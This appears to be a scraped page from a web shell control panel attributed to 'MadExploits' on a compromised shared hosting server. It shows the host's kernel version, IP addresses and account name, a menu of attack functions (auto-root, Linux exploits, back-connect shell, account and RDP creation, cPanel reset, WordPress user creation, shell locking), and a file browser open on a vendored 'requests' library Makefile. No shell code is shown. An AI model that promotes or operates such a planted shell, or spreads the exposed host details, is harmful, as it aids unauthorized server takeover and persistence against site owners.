Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
requests /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.coveragerc
33
B
-rw-r--r--
.git-blame-ignore-revs
234
B
-rw-r--r--
.gitignore
321
B
-rw-r--r--
.pre-commit-config.yaml
593
B
-rw-r--r--
.readthedocs.yaml
738
B
-rw-r--r--
AUTHORS.rst
7.85
KB
-rw-r--r--
HISTORY.md
58.95
KB
-rw-r--r--
LICENSE
9.9
KB
-rw-r--r--
MANIFEST.in
126
B
-rw-r--r--
Makefile
815
B
-rw-r--r--
NOTICE
38
B
-rw-r--r--
README.md
2.86
KB
-rw-r--r--
pyproject.toml
238
B
-rw-r--r--
requirements-dev.txt
92
B
-rw-r--r--
setup.cfg
350
B
-rw-r--r--
setup.py
3.85
KB
-rw-r--r--
tox.ini
283
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
.PHONY: docs init: python -m pip install -r requirements-dev.txt test: # This runs all of the tests on all supported Python versions. tox -p ci: python -m pytest tests --junitxml=report.xml test-readme: python setup.py check --restructuredtext --strict && ([ $$? -eq 0 ] && echo "README.rst and HISTORY.rst ok") || echo "Invalid markup in README.rst or HISTORY.rst!" flake8: python -m flake8 src/requests coverage: python -m pytest --cov-config .coveragerc --verbose --cov-report term --cov-report xml --cov=src/requests tests publish: python -m pip install 'twine>=1.5.0' python setup.py sdist bdist_wheel twine upload dist/* rm -fr build dist .egg requests.egg-info docs: cd docs && make html @echo "\033[95m\n\nBuild successful! View the docs homepage at docs/_build/html/index.html.\n\033[0m"
Close